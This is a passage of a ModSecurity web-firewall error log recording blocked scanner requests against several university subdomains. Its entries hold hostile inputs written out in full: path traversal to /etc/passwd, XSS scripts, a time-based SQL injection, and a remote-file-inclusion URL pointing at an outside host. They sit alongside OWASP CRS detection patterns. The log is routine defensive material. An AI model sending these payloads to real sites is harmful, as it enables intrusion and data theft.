{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAActbHoAAAAH"]
[Tue Aug 29 11:41:05.537638 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAcvBfIAAAAJ"]
[Tue Aug 29 11:41:05.553359 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcYU9sAAAAp"]
[Tue Aug 29 11:41:05.556231 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAYMWVgAAAAR"]
[Tue Aug 29 11:41:06.858376 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124sCo-f0AAAcoNQAAAAAF"]
[Tue Aug 29 11:41:07.423488 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO1248Co-f0AAAcYU@oAAAAp"]
[Tue Aug 29 11:41:07.505994 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22Type\\x22:\\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO1248Co-f0AAAcqJIQAAAAG"]
[Tue Aug 29 11:41:07.682250 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO1248Co-f0AAAcoNQYAAAAF"]
[Tue Aug 29 11:41:07.899829 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO1248Co-f0AAAcoNQ0AAAAF"]
[Tue Aug 29 11:41:08.262143 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO125MCo-f0AAAczXccAAAAL"]
[Tue Aug 29 11:41:08.373265 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAczXcwAAAAL"]
[Tue Aug 29 11:41:08.388413 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAcYU-MAAAAp"]
[Tue Aug 29 11:41:08.399571 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAczXc0AAAAL"]
[Tue Aug 29 11:41:08.474475 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAczXc8AAAAL"]
[Tue Aug 29 11:41:08.481537 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAcoNREAAAAF"]
[Tue Aug 29 11:41:09.280178 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAcYVAMAAAAp"]
[Tue Aug 29 11:41:09.288802 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAc2dOAAAAAN"]
[Tue Aug 29 11:41:09.323560 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAcYVAUAAAAp"]
[Tue Aug 29 11:41:09.326644 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAc4EjEAAAAP"]
[Tue Aug 29 11:41:09.406617 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAc2dOQAAAAN"]
[Tue Aug 29 11:41:09.428224 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAcqJJUAAAAG"]
[Tue Aug 29 11:41:09.429008 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAczXeAAAAAL"]
[Tue Aug 29 11:41:09.599331 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAc2dOsAAAAN"]
[Tue Aug 29 11:41:09.625711 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAc36ssAAAAO"]
[Tue Aug 29 11:41:09.668711 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAczXeoAAAAL"]
[Tue Aug 29 11:41:09.672672 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAYMWVoAAAAR"]
[Tue Aug 29 11:41:10.375525 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAcoNSUAAAAF"]
[Tue Aug 29 11:41:10.385430 2023] [:error] [pid 1849] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver 